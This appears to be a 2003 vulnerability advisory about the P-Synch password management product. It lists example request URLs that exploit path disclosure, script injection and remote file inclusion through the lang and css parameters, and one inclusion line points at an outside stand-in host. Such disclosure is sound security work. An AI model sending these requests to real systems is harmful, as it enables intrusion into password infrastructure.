Multiple Vulnerabilities In P-Synch Password Management

2003-05-30T00:00:00
ID SECURITYVULNS:DOC:4617
Type securityvulns
Reporter Securityvulns
Modified 2003-05-30T00:00:00

Description

Multiple Vulnerabilities In P-Synch Password Management


The other night I came across a server running P-Synch.

I had never heard of it so i was curious to poke around

on it a bit. Within an hour i found the vulns listed below.

Im pretty sure there are other more serious vulns in

P-Synch, but they are very picky about who they give thier

software to, even an evaluation version. So was not able

to test any further. However i encourage any admins running

P-Synch to poke around on it, just to be on the safe side.

Description


P-Synch Total Password Management Solution

by M-TECH

P-Synch is a total password management solution. It is

intended to reduce the cost of ownership of password systems,

and simultaneously improve the security of password protected

systems. This is done through: -Password Synchronization.

-Enforcing an enterprise wide password strength policy.

-Allowing authenticated users to reset their own forgotten

passwords and enable their locked out accounts. -Streamlining

help desk call resolution for password resets. P-Synch is

available for both internal use, on the corporate Intranet,

as well as for the Internet deployment in B2B and B2C

applications.

http://www.securityfocus.com/products/837

Problems


All of these problems are simple, self explanatory vulns

so, i'm sure the below examples will speak for themselves.

Once again this application was NOT thoroughly researced.

So anyone with a copy of P-Synch might wanna explore it

further.

Path Disclosure Vulnerability


https://path/to/psynch/nph-psa.exe?lang=

https://path/to/psynch/nph-psf.exe?lang=

Code Injection Vulnerability


https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]

https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]

File Include Vulnerability


https://path/to/psynch/nph-psf.exe?css=http://somesite/file

https://path/to/psynch/nph-psa.exe?css=http://somesite/file

Credits


All credits go to JeiAr of GulfTech Computers and CSA

Security Research http://www.gulftech.org